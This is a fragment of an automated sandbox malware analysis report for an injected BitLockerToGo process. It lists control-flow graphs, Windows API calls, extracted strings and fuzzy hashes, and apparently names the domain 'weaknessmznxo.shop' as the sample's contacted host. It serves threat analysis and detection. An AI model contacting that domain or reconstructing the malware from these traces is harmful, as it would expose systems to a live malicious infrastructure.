2a18347-2a18371 1138->1141 1139->1138 1140 2a18326-2a1833d 1139->1140 1140->1135 1141->1135 1142->1142 1148 2a18550 1142->1148 1146 2a18577-2a1857f 1143->1146 1147 2a1858b 1143->1147 1145 2a18560-2a18569 1144->1145 1145->1143 1145->1145 1149 2a18580-2a18589 1146->1149 1148->1136 1149->1147 1149->1149
                      Strings
                      Memory Dump Source
                      • Source File: 00000001.00000002.1845000210.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_2a00000_BitLockerToGo.jbxd
                      Similarity
                      • API ID:
                      • String ID: #;~#$4$$($40z4$=& s$bm'3$r
                      • API String ID: 0-1136624806
                      • Opcode ID: 774b699d2a3a69addc782122abdfa92591870f5876ba84e23b774f21e9afdee5
                      • Instruction ID: 2db290d3013822810ab8d5a44814d5dcb31e9fcd51a7c2564c93740055fa8410
                      • Opcode Fuzzy Hash: 774b699d2a3a69addc782122abdfa92591870f5876ba84e23b774f21e9afdee5
                      • Instruction Fuzzy Hash: 1EB1B3716083818FD725CF29C4907ABBBE2EFD6318F18496DD4D98B382DB399506CB52

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 1150 2a17cbb-2a17cf8 1151 2a17d45-2a17daf call 2a166c0 1150->1151 1152 2a17cfa 1150->1152 1156 2a17db1 1151->1156 1157 2a17e1a-2a17eb5 call 2a166c0 1151->1157 1153 2a17d00-2a17d43 1152->1153 1153->1151 1153->1153 1158 2a17dc0-2a17e18 1156->1158 1161 2a17eb7 1157->1161 1162 2a17f1c-2a17f90 call 2a166c0 1157->1162 1158->1157 1158->1158 1163 2a17ec0-2a17f1a 1161->1163 1166 2a17f92 1162->1166 1167 2a17ffa-2a1806a call 2a166c0 1162->1167 1163->1162 1163->1163 1168 2a17fa0-2a17ff8 1166->1168 1171 2a180c7-2a180f2 1167->1171 1172 2a1806c-2a1806f 1167->1172 1168->1167 1168->1168 1174 2a18100-2a18108 1171->1174 1173 2a18070-2a180c5 1172->1173 1173->1171 1173->1173 1174->1174 1175 2a1810a-2a18126 1174->1175 1176 2a189b7 1175->1176 1177 2a1812c-2a18131 1175->1177 1178 2a189ba-2a189cb call 2a08d30 1176->1178 1177->1178 1181 2a189f1-2a18a05 1178->1181 1182 2a189cd-2a189d2 1178->1182 1184 2a18a23 1181->1184 1185 2a18a07-2a18a0f 1181->1185 1183 2a189e0-2a189ef 1182->1183 1183->1181 1183->1183 1187 2a18a27-2a18a2e 1184->1187 1186 2a18a10-2a18a1f 1185->1186 1186->1186 1188 2a18a21 1186->1188 1189 2a18a42-2a18a59 call 2a34600 call 2a166c0 1187->1189 1188->1187 1193 2a18a5e-2a18a75 1189->1193 1193->1189 1195 2a18a30-2a18a3b 1193->1195 1196 2a18ab5-2a18b3d 1193->1196 1197 2a18c06-2a18cb2 1193->1197 1198 2a18a88 1193->1198 1199 2a18a7c-2a18a81 1193->1199 1200 2a18a9c-2a18aae call 2a08d40 1193->1200 1201 2a18d5c-2a18d65 1193->1201 1202 2a18d6c 1193->1202 1203 2a18a8f-2a18a94 1193->1203 1195->1189 1195->1196 1195->1197 1195->1198 1195->1200 1195->1201 1195->1202 1195->1203 1205 2a18b3f 1196->1205 1206 2a18b9e-2a18bcf 1196->1206 1208 2a18cb4 1197->1208 1209 2a18d16-2a18d1b 1197->1209 1198->1203 1199->1189 1199->1196 1199->1197 1199->1198 1199->1200 1199->1201 1199->1202 1199->1203 1200->1196 1200->1202 1201->1196 1201->1202 1207 2a18d74-2a18d86 call 2a08d30 1202->1207 1203->1200 1211 2a18b40-2a18b9c 1205->1211 1212 2a18bd0-2a18bd8 1206->1212 1222 2a18da1-2a18db5 1207->1222 1223 2a18d88-2a18d8f 1207->1223 1214 2a18cc0-2a18d14 1208->1214 1215 2a18d20-2a18d26 1209->1215 1211->1206 1211->1211 1212->1212 1216 2a18bda-2a18c01 1212->1216 1214->1209 1214->1214 1215->1215 1218 2a18d28-2a18d2f 1215->1218 1216->1207 1219 2a18d51-2a18d54 1218->1219 1220 2a18d31-2a18d36 1218->1220 1219->1201 1224 2a18d40-2a18d4b 1220->1224 1226 2a18dd1-2a18e2f 1222->1226 1227 2a18db7-2a18dbf 1222->1227 1225 2a18d90-2a18d9f 1223->1225 1224->1224 1230 2a18d4d-2a18d4f 1224->1230 1225->1222 1225->1225 1228 2a18e31 1226->1228 1229 2a18e93-2a18ec1 1226->1229 1231 2a18dc0-2a18dcf 1227->1231 1232 2a18e40-2a18e91 1228->1232 1233 2a18ed0-2a18ed8 1229->1233 1230->1219 1231->1226 1231->1231 1232->1229 1232->1232 1233->1233 1234 2a18eda-2a18efb 1233->1234 1235 2a18f00-2a18f08 1234->1235 1235->1235 1236 2a18f0a-2a18f50 call 2a08d30 1235->1236 1241 2a18f71-2a18f87 1236->1241 1242 2a18f52-2a18f57 1236->1242 1245 2a18f90-2a18f9f 1241->1245 1243 2a18f60-2a18f6f 1242->1243 1243->1241 1243->1243 1245->1245 1246 2a18fa1-2a18fb6 1245->1246 1248 2a18fd1-2a1900a 1246->1248 1249 2a18fb8-2a18fbf 1246->1249 1251 2a19067-2a190bc call 2a1c1a0 1248->1251 1252 2a1900c-2a1900f 1248->1252 1250 2a18fc0-2a18fcf 1249->1250 1250->1248 1250->1250 1253 2a19010-2a19065 1252->1253 1253->1251 1253->1253
                      Strings
                      Memory Dump Source
                      • Source File: 00000001.00000002.1845000210.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_2a00000_BitLockerToGo.jbxd
                      Similarity
                      • API ID:
                      • String ID: HI$LM$AC$Y[$]_
                      • API String ID: 0-894271490
                      • Opcode ID: 902558ca37d9964fd06abd5d13405a216170ae64b8d8ea25b68685ec920856cb
                      • Instruction ID: 94357664905cd641830a2606655390a7eccc2be03b9003dc512bf1ec23552f88
                      • Opcode Fuzzy Hash: 902558ca37d9964fd06abd5d13405a216170ae64b8d8ea25b68685ec920856cb
                      • Instruction Fuzzy Hash: 02D178726183848BD714CF16C88065FBBE2FFC6314F488A1CE8959B395DB74DA09CB86
                      Strings
                      Memory Dump Source
                      • Source File: 00000001.00000002.1845000210.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_2a00000_BitLockerToGo.jbxd
                      Similarity
                      • API ID:
                      • String ID: BM$M|$VB$d{
                      • API String ID: 0-4262012137
                      • Opcode ID: c405f17b584ac977538cc720a7f538d01479950c537c68fb3830011a16bd2053
                      • Instruction ID: 40fa8155c70a3c359dc014b74eef08d2ae86b6acfd6b434a93d1b234b798653e
                      • Opcode Fuzzy Hash: c405f17b584ac977538cc720a7f538d01479950c537c68fb3830011a16bd2053
                      • Instruction Fuzzy Hash: 8EC189B5904B80CFE324CF29D891B16BBE2FB8A344F544D2DD1DA87690DB36E456CB81
                      Strings
                      Memory Dump Source
                      • Source File: 00000001.00000002.1845000210.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_2a00000_BitLockerToGo.jbxd
                      Similarity
                      • API ID:
                      • String ID: *YX[$=]+_$|AvC
                      • API String ID: 0-3033963198
                      • Opcode ID: 1012c80ad53dd59e750dcd5c67388c02ba39c45155c9c59d7b4a7d5988e97b3f
                      • Instruction ID: c06046fe7df30f5174dcf59519598365726408ebf585fd8912ef2842c6ec4553
                      • Opcode Fuzzy Hash: 1012c80ad53dd59e750dcd5c67388c02ba39c45155c9c59d7b4a7d5988e97b3f
                      • Instruction Fuzzy Hash: AF9197B15083409BD314CF18C891B6BBBF1EF85798F148A1DF4D98B2A1E778D909CB86
                      APIs
                      • GetVolumeInformationW.KERNELBASE(7BAD7941,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 02A3446D
                      Strings
                      Memory Dump Source
                      • Source File: 00000001.00000002.1845000210.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_2a00000_BitLockerToGo.jbxd
                      Similarity
                      • API ID: InformationVolume
                      • String ID: gxyz
                      • API String ID: 2039140958-2474275795
                      • Opcode ID: 3ff277f881a52cc6580042472854bb8d4e71df21cf013cbe1bd24d9524724012
                      • Instruction ID: 9c12eca96890894bf7a7b6af941640d17b43c605f605c94f544c6ab3e8312479
                      • Opcode Fuzzy Hash: 3ff277f881a52cc6580042472854bb8d4e71df21cf013cbe1bd24d9524724012
                      • Instruction Fuzzy Hash: 23E1D075A08741CFD725CF28D880B2AB7F2EF89308F54892CF5954B691DB76E815CB81
                      Strings
                      Memory Dump Source
                      • Source File: 00000001.00000002.1845000210.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_2a00000_BitLockerToGo.jbxd
                      Similarity
                      • API ID:
                      • String ID: )$IEND
                      • API String ID: 0-707183367
                      • Opcode ID: 78538f6221593af019f8044212b5c73d66c8043d203e3fef4441e465db0816b2
                      • Instruction ID: 5952a38cd2cc84df870d4cf2f327c5429d620a1784fa32eda4a41519303baf56
                      • Opcode Fuzzy Hash: 78538f6221593af019f8044212b5c73d66c8043d203e3fef4441e465db0816b2
                      • Instruction Fuzzy Hash: C6E19DB1A083449FD710DF28E88475ABBE1BF98304F44492DF9959B3C1DB79E908CB82
                      Strings
                      Memory Dump Source
                      • Source File: 00000001.00000002.1845000210.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_2a00000_BitLockerToGo.jbxd
                      Similarity
                      • API ID: InitializeThunk
                      • String ID: avub${'~s
                      • API String ID: 2994545307-4052730433
                      • Opcode ID: a0e5b1f05a7d729158c5f3ec2270c0c20076a046cb8d100cdc5658384645ae7e
                      • Instruction ID: 8460eb2ff467c53f96d9966309175bfced2aac63dff69f62a2c5cd3ad65bd32c
                      • Opcode Fuzzy Hash: a0e5b1f05a7d729158c5f3ec2270c0c20076a046cb8d100cdc5658384645ae7e
                      • Instruction Fuzzy Hash: 46C19F71A083219FD714CF18C99076BB7E2EBC5714F18892DE8858B381EB38DD59DB92
                      Strings
                      Memory Dump Source
                      • Source File: 00000001.00000002.1845000210.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_2a00000_BitLockerToGo.jbxd
                      Similarity
                      • API ID:
                      • String ID: gxyz$gxyz
                      • API String ID: 0-4102614194
                      • Opcode ID: d0b792f52a0e52d7828f020a94a60f3adbe6bad68558dfe77d7daa4f7e45b4e1
                      • Instruction ID: c3ceae83fdebfcb2d3e4bd092cff2efde0c915068ecf12a87cd60f1fac8bbaf9
                      • Opcode Fuzzy Hash: d0b792f52a0e52d7828f020a94a60f3adbe6bad68558dfe77d7daa4f7e45b4e1
                      • Instruction Fuzzy Hash: 6E816978644701CFD325CF29D890B22B7F2FB8A704F14886CE5D68B696DB36E856CB40
                      Strings
                      Memory Dump Source
                      • Source File: 00000001.00000002.1845000210.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_2a00000_BitLockerToGo.jbxd
                      Similarity
                      • API ID:
                      • String ID: [-V#$gxyz
                      • API String ID: 0-859779740
                      • Opcode ID: a7372afbb69cfe2f47bc9b95e493d8380864007f96074430b7e49b9462da973c
                      • Instruction ID: d37131221512dc68b933b8e482c50409f62ef0414dd4172f7da5ec2608553cda
                      • Opcode Fuzzy Hash: a7372afbb69cfe2f47bc9b95e493d8380864007f96074430b7e49b9462da973c
                      • Instruction Fuzzy Hash: 8551CE75A083019FD715DF18D880B2AB7E2BBC5708F158A2DF6848B241EB35D815CB96
                      Strings
                      Memory Dump Source
                      • Source File: 00000001.00000002.1845000210.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_2a00000_BitLockerToGo.jbxd
                      Similarity
                      • API ID:
                      • String ID: weaknessmznxo.shop
                      • API String ID: 0-4067726560
                      • Opcode ID: 3978eb019d6cdb296f03d9583815e8774dddc372261abe48c6e05f5062301205
                      • Instruction ID: f15ed1c934effc33d386515899cb22138b56139e7b69dbf5e572484661bcbebc
                      • Opcode Fuzzy Hash: 3978eb019d6cdb296f03d9583815e8774dddc372261abe48c6e05f5062301205
                      • Instruction Fuzzy Hash: E3B173B055D3D18BD331CF14C494B9FBBE1BBC2308F185A5CE8D86B285CB7599058BA6
                      APIs
                      • LdrInitializeThunk.NTDLL(02A3BFFC,005C003F,00000006,?,005C003F,00000018,A8A9AEAF,00000000,?), ref: 02A39896
                      Memory Dump Source
                      • Source File: 00000001.00000002.1845000210.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_2a00000_BitLockerToGo.jbxd
                      Similarity
                      • API ID: InitializeThunk
                      • String ID:
                      • API String ID: 2994545307-0
                      • Opcode ID: 3af67e3b8a4cf002b2d8122619789f5e408d063de0ae60c6913db66b84c766ee
                      • Instruction ID: 9a2a3e30e6272c7ba4599b7d5b49d8b1df743313db24dc7d28a19b0c9381744b
                      • Opcode Fuzzy Hash: 3af67e3b8a4cf002b2d8122619789f5e408d063de0ae60c6913db66b84c766ee
                      • Instruction Fuzzy Hash: 82D04875908216AB9A09CF44C54040EFBE6BFC4714F228C8EA88873214C3B0BD46EB82
                      Strings
                      Memory Dump Source
                      • Source File: 00000001.00000002.1845000210.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_2a00000_BitLockerToGo.jbxd
                      Similarity
                      • API ID: InitializeThunk
                      • String ID: @
                      • API String ID: 2994545307-2766056989
                      • Opcode ID: 050d76eda378311c0941f36f8ff664b02cc6157e3b596722cbccff1937c77c2d
                      • Instruction ID: a3c8710f0fc7db784ee88f014659fde0d7838ca354567fe845ea8f494b711225
                      • Opcode Fuzzy Hash: 050d76eda378311c0941f36f8ff664b02cc6157e3b596722cbccff1937c77c2d
                      • Instruction Fuzzy Hash: D941CDB55083008FD301DF18DC90B2AB7F2EF85328F048A1DF4989B291EB39D919CB96
                      Memory Dump Source
                      • Source File: 00000001.00000002.1845000210.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_2a00000_BitLockerToGo.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 1c9a8736c01de4bd97718d48e4585191aef55e52838119076f280c0afdb2cebd
                      • Instruction ID: f7652c6094c817a89fe56dc578c5e7d6fbc74809f1fe07dc8daef3d8ae4f5bd8
                      • Opcode Fuzzy Hash: 1c9a8736c01de4bd97718d48e4585191aef55e52838119076f280c0afdb2cebd
                      • Instruction Fuzzy Hash: 79424874600B018FD725CF29D990B62B7E2FF4A314F04896CD9AA8B7A1EB75F805CB54
                      Memory Dump Source
                      • Source File: 00000001.00000002.1845000210.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_2a00000_BitLockerToGo.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: f4708c22a2574a266bed80f31c6539c4c70ba06efc9e56156041c79725e41f26
                      • Instruction ID: 30084f23be5927edfd91a61f221f5cf78ddc0c7cf070b02a05d9bb3ea005a459
                      • Opcode Fuzzy Hash: f4708c22a2574a266bed80f31c6539c4c70ba06efc9e56156041c79725e41f26
                      • Instruction Fuzzy Hash: 31227BB5600B018FD725CF28D990B66B7E2FF89314F08896DD8AA8B791DB35F845CB50
                      Memory Dump Source
                      • Source File: 00000001.00000002.1845000210.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_2a00000_BitLockerToGo.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 9432ebb0e8b75d841236edc8bd0e0144d76b724b38e1268037711d0adef168d0
                      • Instruction ID: 4da7d136d4dca5379930de7d12a58bf8920bba29690e53f908d4b4600a5612ec
                      • Opcode Fuzzy Hash: 9432ebb0e8b75d841236edc8bd0e0144d76b724b38e1268037711d0adef168d0
                      • Instruction Fuzzy Hash: 4B22A379A04641CFC728CF28D490626B7F2FF8A314B198A6DD496C7792DB36E852CF50
                      Memory Dump Source
                      • Source File: 00000001.00000002.1845000210.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_2a00000_BitLockerToGo.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 8a593d1a360a2c2f8108c79a75006b03c331435d918e5eef391a2fc99bcbac65
                      • Instruction ID: e224ef055f33fa427c5a9e8c4b5d298c0dd408d2263631eea0e3a244fd14661f
                      • Opcode Fuzzy Hash: 8a593d1a360a2c2f8108c79a75006b03c331435d918e5eef391a2fc99bcbac65
                      • Instruction Fuzzy Hash: 0D81BC75A083129BC715DF18C890B6AB7E2FF84724F15891DF585AB260DB31ED60CB82
                      Memory Dump Source
                      • Source File: 00000001.00000002.1845000210.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_2a00000_BitLockerToGo.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 2065e02d7f57bc9bf369feedf0156d550dc1c13fa7cfd4da30778ed7bd3d1a7a
                      • Instruction ID: 443cda7f38e0fca1e8a0276f5fd005055ca98986b5f09a30e8a0f36f63d0fc51
                      • Opcode Fuzzy Hash: 2065e02d7f57bc9bf369feedf0156d550dc1c13fa7cfd4da30778ed7bd3d1a7a
                      • Instruction Fuzzy Hash: 9061F8B0914B00AFD364DF2DC95AB57BBE8EB49360F104A5DF9AA87390D7316810CBD6
                      Memory Dump Source
                      • Source File: 00000001.00000002.1845000210.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_2a00000_BitLockerToGo.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: a68f2bd06fb604a76e4a991fd5baffc6637eb9f22064fa34d7702ba279239102
                      • Instruction ID: 1a4e42b5008ea1e3b3b7f63c4ef0464f2b615351a0bf9f0c9e96e3bdde67c7f9
                      • Opcode Fuzzy Hash: a68f2bd06fb604a76e4a991fd5baffc6637eb9f22064fa34d7702ba279239102
                      • Instruction Fuzzy Hash: 0D51C9756183019FD315DF28CC80B6AB7E2EFC5728F14881EF598AB281DB35E825CB46

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 162 2a2b85e-2a2b8dd 163 2a2b922-2a2b976 SysAllocString 162->163 164 2a2b8df 162->164 167 2a2b980-2a2b997 163->167 165 2a2b8e1-2a2b91e 164->165 165->165 166 2a2b920 165->166 166->163
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000001.00000002.1845000210.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_2a00000_BitLockerToGo.jbxd
                      Similarity
                      • API ID: AllocString
                      • String ID: 0$8$:$A$C$Q$R$S$U$W$Y$[$]$_$b$m
                      • API String ID: 2525500382-4138873195
                      • Opcode ID: 83e0c02dbe4e8ef041d646d6fc2bb2e29a702bc64294bf4d51d2b6ea1ad91b38
                      • Instruction ID: 19d7b6558afcec19cc78c6e82bfa6b32f0a47db9d54fcaab3503b6aecfd78376
                      • Opcode Fuzzy Hash: 83e0c02dbe4e8ef041d646d6fc2bb2e29a702bc64294bf4d51d2b6ea1ad91b38
                      • Instruction Fuzzy Hash: 8C41C570108B80CEE715CF28C494756BFE0AB56308F08899DD8998F397C7B9E559CBA2

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 1003 2a094d0-2a094e8 call 2a09600 call 2a391c0 1008 2a094ea 1003->1008 1009 2a094ef-2a094f6 call 2a31970 1003->1009 1010 2a095c8-2a095d4 ExitProcess 1008->1010 1013 2a094f8 1009->1013 1014 2a094fd-2a0951f CoInitializeEx 1009->1014 1015 2a095bf-2a095c6 call 2a39700 1013->1015 1016 2a09521 1014->1016 1017 2a09526-2a09580 CoInitializeSecurity 1014->1017 1015->1010 1018 2a095bd 1016->1018 1020 2a09582 1017->1020 1021 2a09584-2a0958b call 2a0a640 1017->1021 1018->1015 1023 2a095b5-2a095bb CoUninitialize 1020->1023 1027 2a0958d 1021->1027 1028 2a0958f-2a095a7 call 2a095e0 call 2a0f290 1021->1028 1023->1018 1029 2a095b3 1027->1029 1033 2a095ac-2a095b1 call 2a0c4e0 1028->1033 1029->1023 1033->1029
                      APIs
                      Strings
                      • system or character via spellings glyphs a is uses that in their modified other on often reflection or resemblance on it leetspeak, used similarity internet. play eleet the of the replacements of primarily ways, xrefs: 02A0958F
                      Memory Dump Source
                      • Source File: 00000001.00000002.1845000210.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_2a00000_BitLockerToGo.jbxd
                      Similarity
                      • API ID: ExitProcess
                      • String ID: system or character via spellings glyphs a is uses that in their modified other on often reflection or resemblance on it leetspeak, used similarity internet. play eleet the of the replacements of primarily ways
                      • API String ID: 621844428-780655312
                      • Opcode ID: 151c3fddc2f87802a473c1ca5d6055726d0662f842a854f596948c263b6ad570
                      • Instruction ID: 1f5489e062fa346bb2b928c31a35424fa129d0a1b00c2592351c39e9d45df9ba
                      • Opcode Fuzzy Hash: 151c3fddc2f87802a473c1ca5d6055726d0662f842a854f596948c263b6ad570
                      • Instruction Fuzzy Hash: 0E214AB08082128AD710BF76F68832F7AF4AB41B54F004919E995961C2DFBAD15DCFD3

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 1257 2a0a640-2a0a75f call 2a09600 1262 2a0a761-2a0a767 1257->1262 1263 2a0a7d7-2a0a815 LoadLibraryExW call 2a39180 1257->1263 1264 2a0a769-2a0a7c7 1262->1264 1269 2a0a817-2a0a826 1263->1269 1270 2a0a82b-2a0a9c9 call 2a3b300 * 12 1263->1270 1264->1264 1266 2a0a7c9-2a0a7d5 1264->1266 1266->1263 1275 2a0b24f-2a0b25e 1269->1275 1298 2a0a9cf-2a0a9df 1270->1298 1299 2a0a9e1-2a0a9ea 1298->1299 1300 2a0a9ef-2a0aa33 call 2a348d0 1298->1300 1303 2a0ab5a-2a0ab66 1299->1303 1312 2a0aa35-2a0aa3f 1300->1312 1303->1275 1311 2a0ab6c-2a0ad80 GetProcessVersion call 2a08ef0 1303->1311 1320 2a0ad82 1311->1320 1321 2a0ade5-2a0ae0a call 2a0bd80 1311->1321 1312->1312 1314 2a0aa41-2a0aa64 1312->1314 1315 2a0aa74-2a0aa7a 1314->1315 1316 2a0aa66-2a0aa72 1314->1316 1319 2a0aa7c-2a0aa7f 1315->1319 1318 2a0aadc-2a0aaed call 2a0b260 1316->1318 1331 2a0aaf2-2a0aaf7 1318->1331 1323 2a0aa81-2a0aa84 1319->1323 1324 2a0aa86-2a0aad4 call 2a0f110 1319->1324 1326 2a0ad84-2a0addb 1320->1326 1340 2a0ae11-2a0aecf 1321->1340 1341 2a0ae0c 1321->1341 1329 2a0aad6-2a0aad9 1323->1329 1324->1319 1324->1329 1326->1326 1327 2a0addd-2a0ade3 1326->1327 1327->1321 1329->1318 1334 2a0aaf9-2a0ab2f 1331->1334 1335 2a0aafb-2a0ab26 call 2a0bd40 1331->1335 1339 2a0ab31-2a0ab35 1334->1339 1335->1339 1343 2a0ab40-2a0ab46 1339->1343 1344 2a0ab37-2a0ab3e 1339->1344 1346 2a0aed1 1340->1346 1347 2a0af1c-2a0af49 call 2a0c460 1340->1347 1345 2a0b240-2a0b24d 1341->1345 1349 2a0ab58 1343->1349 1350 2a0ab48-2a0ab53 1343->1350 1344->1343 1345->1275 1351 2a0aed3-2a0af18 1346->1351 1359 2a0af50-2a0af95 1347->1359 1360 2a0af4b 1347->1360 1349->1303 1350->1298 1351->1351 1355 2a0af1a 1351->1355 1355->1347 1362 2a0aff4-2a0b013 call 2a0c460 1359->1362 1363 2a0af97 1359->1363 1361 2a0b1fd-2a0b218 call 2a37eb0 1360->1361 1374 2a0b21a-2a0b230 1361->1374 1375 2a0b21c-2a0b227 1361->1375 1362->1361 1371 2a0b019-2a0b04b call 2a0c4b0 1362->1371 1365 2a0af99-2a0afed 1363->1365 1365->1365 1368 2a0afef-2a0aff2 1365->1368 1368->1362 1381 2a0b051-2a0b061 1371->1381 1378 2a0b232-2a0b23c 1374->1378 1375->1378 1378->1275 1384 2a0b23e 1378->1384 1385 2a0b073-2a0b093 1381->1385 1386 2a0b063-2a0b110 1381->1386 1384->1345 1392 2a0b095-2a0b09b 1385->1392 1393 2a0b0cf-2a0b0d4 1385->1393 1396 2a0b116-2a0b120 1386->1396 1392->1393 1394 2a0b09d-2a0b0cd 1392->1394 1395 2a0b0d6-2a0b100 1393->1395 1394->1395 1395->1381 1396->1396 1399 2a0b122-2a0b151 1396->1399 1400 2a0b153-2a0b159 1399->1400 1401 2a0b1b7-2a0b1cf call 2a0b260 1399->1401 1403 2a0b15b-2a0b15e 1400->1403 1409 2a0b1d1 1401->1409 1410 2a0b1d3-2a0b1f3 call 2a0bd40 1401->1410 1405 2a0b160-2a0b162 1403->1405 1406 2a0b164-2a0b1b2 call 2a0f110 1403->1406 1407 2a0b1b4 1405->1407 1406->1403 1406->1407 1407->1401 1412 2a0b1f5-2a0b1fb 1409->1412 1410->1412 1412->1361
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000001.00000002.1845000210.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_2a00000_BitLockerToGo.jbxd
                      Similarity
                      • API ID: LibraryLoadProcessVersion
                      • String ID: weaknessmznxo.shop
                      • API String ID: 1829952579-4067726560
                      • Opcode ID: 506e53c0b8608be2508cfb08909959829ea849915f49d9b84cc9247e365dcc8f
                      • Instruction ID: 16abec9909c428dba3cf736af9815025fbf6c5f833631f55b3b6f5bfbb1d5fb1
                      • Opcode Fuzzy Hash: 506e53c0b8608be2508cfb08909959829ea849915f49d9b84cc9247e365dcc8f
                      • Instruction Fuzzy Hash: CE928F70508B80CED321CF38D584756BFE1AB16318F058A9DD4EA8B7E2D775E44ACB62
                      APIs
                      • GetSystemDirectoryW.KERNEL32(?), ref: 02A107B9
                      • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 02A1083B
                      Memory Dump Source
                      • Source File: 00000001.00000002.1845000210.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_2a00000_BitLockerToGo.jbxd
                      Similarity
                      • API ID: DirectorySystem
                      • String ID:
                      • API String ID: 2188284642-0
                      • Opcode ID: c4a3f5988eb5d6ca8a1ea06dbc2083f0a18f42a37b7c4f7b504e4230d1de090c
                      • Instruction ID: 3c211ae921e2b81ed6da210f15f88634fe588762a2fc5c641bd684338e04debb
                      • Opcode Fuzzy Hash: c4a3f5988eb5d6ca8a1ea06dbc2083f0a18f42a37b7c4f7b504e4230d1de090c
                      • Instruction Fuzzy Hash: 5E216AB5D886544BD3389730ADC222FB5D7DF85324F18463AEC90C6294DB39CD468A92
                      APIs
                      • RtlFreeHeap.NTDLL(?,00000000,02A37F62), ref: 02A37F4B
                      Memory Dump Source
                      • Source File: 00000001.00000002.1845000210.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_2a00000_BitLockerToGo.jbxd
                      Similarity
                      • API ID: FreeHeap
                      • String ID:
                      • API String ID: 3298025750-0
                      • Opcode ID: 48b9f98c17fd01ce6b39f2b3c1ba268faeb44d3f5e342ea340296851fee0833e
                      • Instruction ID: 0ea8fb63193cfe7380dff03463dc1a4be7165e27af85ada6d2f8c994e5c0cffc
                      • Opcode Fuzzy Hash: 48b9f98c17fd01ce6b39f2b3c1ba268faeb44d3f5e342ea340296851fee0833e
                      • Instruction Fuzzy Hash: 7311C8756046418BD310CF18D891B46B7A6EF8A728F38896CE5944B785D732E817CBD4
                      APIs
                      • GetLogicalDrives.KERNELBASE ref: 02A392B8
                      Memory Dump Source
                      • Source File: 00000001.00000002.1845000210.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
